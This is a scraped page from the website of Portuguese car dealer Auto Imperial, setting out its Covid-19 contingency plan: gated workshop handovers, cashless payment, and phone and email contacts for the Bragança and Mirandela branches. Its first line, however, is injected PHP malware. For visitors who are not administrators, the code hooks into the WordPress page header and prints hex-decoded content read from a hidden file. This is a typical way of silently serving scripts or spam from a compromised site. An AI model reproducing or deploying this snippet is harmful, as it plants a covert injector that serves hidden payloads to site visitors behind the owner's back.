if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Covid-19 - Auto Imperial
 

Covid-19

Plano de Contingência: Covid-19

Auto Imperial

Estimados clientes e parceiros,

No momento em que o mundo e Portugal enfrentam uma situação de enorme exigência, face à pandemia do Covid 19, e na sequência da orientação da Direção Geral de Saúde para as empresas ( Orientação 0062020 de 26 de Janeiro ), a Auto Imperial colocou  em prática um Plano de Contingência que inclui a alteração de alguns dos seus procedimentos internos, comerciais e após-venda com vista a proteção dos seus colaboradores, clientes e respetivas famílias.

A COVID-19 transmite-se por contacto próximo com pessoas infetadas pelo vírus, ou superfícies e objetos contaminados. Esta doença transmite-se através de gotículas libertadas pelo nariz ou boca quando tossimos ou espirramos, que podem atingir diretamente a boca, nariz e olhos de quem estiver próximo. As gotículas podem depositar-se nos objetos ou superfícies que rodeiam a pessoa infetada. Por sua vez, outras pessoas podem infetar-se ao tocar nestes objetos ou superfícies e depois tocar nos olhos, nariz ou boca com as mãos.

Face ao exposto, foram adotadas, com efeito imediato, as seguintes medidas:

Oficina – Receção/entrega de viaturas

> Iremos trabalhar de portões encerrados. Iremos continuar a receber os serviços agendados e marcações e atendimento prioritário as autoridades nacionais de emergência como GNR, Médicos, Bombeiros etc.

A logística irá ser a seguinte: a viatura será colocada no exterior das instalações, de seguida deverá contactar os nossos gestores de clientes para os contactos abaixo mencionados de forma a darmos o devido seguimento. Após concretização da intervenção iremos proceder a devolução da viatura nos mesmos moldes. Pedimos para deixar a chave na viatura, e poderá comunicar verbalmente com o gestor de cliente visto que um dos portões irá ficar entre aberto.

Apelamos a que mantenham a distância mínima de segurança;

Os gestores de cliente estão disponíveis através de contacto telefónico

Bragança:  273 302 608  ou 966 178 717 e por e-mail  aposvenda@autoimperial.eu

Mirandela: 278 261 915 ou 967 834 188 e por e-mail aposvenda.mrd@autoimperial.eu

 

> Em todos os contactos pessoais que se possam potenciar é favor manter a distância mínima de segurança (1 metro);

> Após deixar a sua viatura iremos proceder a título preventivo à desinfeção dos pontos chaves da sua viatura incluindo a chave;

> Após a intervenção a viatura será entregue ao cliente no exterior prontamente desinfetada;

> Cancelamento de test drive de acompanhamento, com clientes, para efeitos de deteção de avarias ou ruídos e todo o tipo de testes de estrada;

> Cancelamento do serviço de mobilidade dos clientes, assim sendo, apelamos a que possam arranjar transporte alternativo visto que não será permitida a permanência nas nossas instalações;

> Cancelamento do serviço de limpeza e lavagem da viatura;

Não se aceitam pagamentos realizados com dinheiro, todos os pagamentos deverão ser feitos com cartão de débito/crédito ou por transferência bancária;

O serviço de venda de peças ao balcão, todavia, os nossos colaboradores estão disponíveis via telefone e por email.

Bragança:   273 302 603   e por e-mail   pecas.moises@autoimperial.eu

273 302 601   e por e-mail   pecas.delmino@autoimperial.eu

Mirandela: 278 261 911   e por e-mail   pecas.mirandela@autoimperial.eu

 

Área Comercial

> Os nossos consultores comerciais estarão disponíveis tanto no stand como por via online, prontamente para fazer videochamadas, enviar-lhe fotografias da viatura que pretende, enviar-lhe propostas e responder-lhe a todas as suas dúvidas;

> Pode entrar em contacto com os nossos consultores, através dos emails:

Toyota Bragança:

luis.vendas@autoimperial.eu  914 600108  ou comercial.toyota@autoimperial.eu  911 510 951

Toyota Mirandela:

Jorge.vendas@autoimperial.eu  917 548 077

Hyundai :

Comercial.hyundai@autoimperial.eu  912 258 460

Assuntos gerais de Vendas:  filipe.pires@autoimperial.eu

> Limitação/cancelamento de test drive com potenciais clientes na área comercial;

> O nosso site www.autoimperial.pt e sub-sites estão neste momento a sofrer alterações de forma que a distância que nos separa não seja mensurável.

Serviços administrativos

> A área administrativa funcionará de portas fechadas, sendo que algum assunto urgente poderá ser tratado via email (geral@autoimperial.eu) (filipa.pires@autoimperial.eu) ou por telefone (273 302 600), no período laboral reduzido das 9h -12h e das 14h – 18h

> A área de contabilidade funcionará de portas fechadas, sendo que algum assunto urgente poderá ser tratado via email (contabilidade@autoimperial.eu) ou por telefone (273 302 600 ), no período laboral das 9h -12h e das 14h – 18h.

Medidas internas:

Reforço das medidas de higiene com promoção de informações de sanidade e afixados cartazes sobre como devem ser realizadas.

 

This will close in 5 seconds